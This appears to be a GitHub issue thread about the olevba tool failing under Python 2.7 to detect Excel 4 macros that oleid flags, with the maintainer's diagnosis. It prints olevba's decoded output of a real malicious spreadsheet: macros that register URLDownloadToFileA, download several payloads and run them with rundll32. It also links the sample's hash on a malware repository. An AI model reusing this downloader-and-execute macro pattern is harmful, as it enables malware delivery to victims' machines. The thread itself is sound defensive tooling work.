Open randubin opened 2 years ago
I can see this problem was solved in version oletools-0.60.1.dev6. Sorry.
Sorry for python 3.8.8 it works with the latest version. For python 2.7.18 with the latest oletools ( 0.60.1.dev6 ) OleId and olevba do not detect the macro. Python 2.7.18:
Type: OLE
ERROR Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/olevba.py", line 3454, in _extract_xlm_plugin_biff
self.xlm_macros = biff_plugin.Analyze()
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
cellref, expression = ParseLoc(expression, cellrefformat, True)
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
row, column = struct.unpack(formatcodes, expression[0:formatsize])
error: unpack requires a string argument of length 4
No VBA or XLM macros found.
Python 3.8.8:
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: DocuSign., Macrosheet
' CELL:E178, =EXEC((('Bob'!L39&" ")&'Bob'!J39)&'Bob'!L41), 0
' CELL:D181, =Kopaters(0.0,('Bob'!J43&C191)&C185,'Bob'!J39&"2",0.0,0.0), 29
' CELL:D183, =Kopaters(0.0,('Bob'!J43&C193)&C185,'Bob'!J39&"4",0.0,0.0), 29
' CELL:E182, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"4")&'Bob'!L41), 0
' CELL:E180, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"2")&'Bob'!L41), 0
' CELL:D185, =Kopaters(0.0,('Bob'!J43&C195)&C185,'Bob'!J39&"6",0.0,0.0), 29
' CELL:E184, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"6")&'Bob'!L41), 0
' CELL:D178, =REGISTER((((('Bob'!H39&'Bob'!H40)&'Bob'!H41)&'Bob'!H42)&'Bob'!H43)&'Bob'!H44,(((((((((('Bob'!I39&'Bob'!I40)&'Bob'!I41)&'Bob'!I42)&'Bob'!I43)&'Bob'!I44)&'Bob'!I45)&'Bob'!I46)&'Bob'!I47)&'Bob'!I48)&'Bob'!I49)&"ToFileA","JJCCBB","Kopaters",,1.0,9.0), 0
' CELL:E186, =HALT(), 0
' CELL:D182, =Kopaters(0.0,('Bob'!J43&C192)&C185,'Bob'!J39&"3",0.0,0.0), 29
' CELL:D180, =Kopaters(0.0,('Bob'!J43&C190)&C185,'Bob'!J39&"1",0.0,0.0), 29
' CELL:A180, =GOTO(D178), 0
' CELL:E179, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"1")&'Bob'!L41), 0
' CELL:D184, =Kopaters(0.0,('Bob'!J43&C194)&C185,'Bob'!J39&"5",0.0,0.0), 29
' CELL:C185, =<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&".jpg", 3118268.jpg
' CELL:E181, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"3")&'Bob'!L41), 0
' CELL:E183, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"5")&'Bob'!L41), 0
' CELL:D188, =GOTO(E178), 42
' CELL:D179, =D184, 0.0
...
..
' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS:
' CELL:A180 , FullEvaluation , GOTO(D178)
' CELL:D178 , FullEvaluation , =REGISTER("URLMon","URLDownloadToFileA","JJCCBB","Kopaters",1,9)
' CELL:D179 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D180 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss1",0,0)
' CELL:D181 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss2",0,0)
' CELL:D182 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss3",0,0)
' CELL:D183 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss4",0,0)
' CELL:D184 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D185 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss6",0,0)
' CELL:D188 , FullEvaluation , GOTO(E178)
' CELL:E178 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss,DllRegisterServer")
' CELL:E179 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss1,DllRegisterServer")
' CELL:E180 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss2,DllRegisterServer")
' CELL:E181 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss3,DllRegisterServer")
' CELL:E182 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss4,DllRegisterServer")
' CELL:E183 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss5,DllRegisterServer")
' CELL:E184 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss6,DllRegisterServer")
' CELL:E186 , End , HALT()
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|URLDownloadToFileA |May download files from the Internet |
|Suspicious|EXEC |May run an executable file or a system |
| | |command using Excel 4 Macros (XLM/XLF) |
|Suspicious|REGISTER |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
...
...
...
|Suspicious|XLM macro |XLM macro found. It may contain malicious |
| | |code |
+----------+----------------
I see that on Python 3 you have XLMMacroDeobfuscator installed, so it works well. But on Python 2 it is not installed, so olevba falls back to plugin_biff instead, and it triggers an exception when parsing the macro.
If you install XLMMacroDeobfuscator on python 2 it should work: could you please try?
You can do it by running pip2 install -U oletools[full]
It seems that XLMMacroDeobfuscator doesn't support python 2, only >3.4. I tried to install it with 'full', but I. am getting the following error: ERROR: Could not find a version that satisfies the requirement complete (from versions: none) ERROR: No matching distribution found for full When Installing XLMMacroDeobfuscator directly, I am getting: ERROR: Package 'XLMMacroDeobfuscator' requires a different Python: 2.7.18 not in '>=3.4' Thanks for the help!
OK, good catch. Then I need to adapt the setup script for python 2. And to improve error handling when executing plugin_biff + check why oleid reports macros and not olevba.
Affected tool: olevba version 0.6 (latest) Describe the bug OLEVBA failed to show and detect the macro inside XLS file. While OleId do indicate that.
File/Malware sample to reproduce the bug Link: https://bazaar.abuse.ch/sample/2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f/ sha256: 2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f
OleId:
OleId How To Reproduce the bug regular run of oleid and olevba. Expected behavior olevba macro detected.
Console output / Screenshots If applicable, add screenshots to help explain your problem. Use the option "-l debug" to add debugging information, if possible.
Version information:
Additional context no need.